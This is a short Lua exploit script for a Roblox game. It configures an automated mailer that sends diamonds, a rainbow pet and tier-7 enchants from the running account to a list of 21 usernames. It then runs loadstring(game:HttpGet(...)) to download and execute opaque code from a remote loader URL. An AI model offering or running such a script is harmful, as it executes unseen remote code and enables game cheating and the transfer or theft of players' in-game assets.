script_key = "MqecHedshHEVyKwajNZtPvbdLkZceNYP";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "5m"},
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
["Strong Pets"] = {Class = "Enchant",Id = "Strong Pets",Tier = 7, Amount = 1},
["Lucky Eggs"] = {Class = "Enchant",Id = "Lucky Eggs",Tier = 7, Amount = 1},
["Criticals"] = {Class = "Enchant",Id = "Criticals",Tier = 7, Amount = 1},
["Treasure Hunter"] = {Class = "Enchant",Id = "Treasure Hunter",Tier = 7, Amount = 1},
["Tap Power"] = {Class = "Enchant",Id = "Tap Power",Tier = 7, Amount = 1},
}
_G.GMAIL_RECEIVERS = {
"Jac0bDriftShad3",
"Th3R3al3mmatwist",
"NexusEvanKite2021",
"IsaiahLavaRift2018",
"JohnFrostReaper31",
"MrsNatalieWhirl2016",
"ItsShadowDynamo",
"Savannah_St0rmy82",
"ITSMADISON_Cactus200",
"NexusMilachime2009",
"EliFusionMirage",
"TheRealKaleido_Legen",
"SonicNebulaRadiant",
"NEXUSKYLE_Quack",
"MrsKenXenon",
"TheRealQuestVector10",
"Petter_Sorcerer86",
"MingGwenGrace46",
"DorisDaphneDiego",
"SachikoDaltonClara",
"ChadAlic313",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
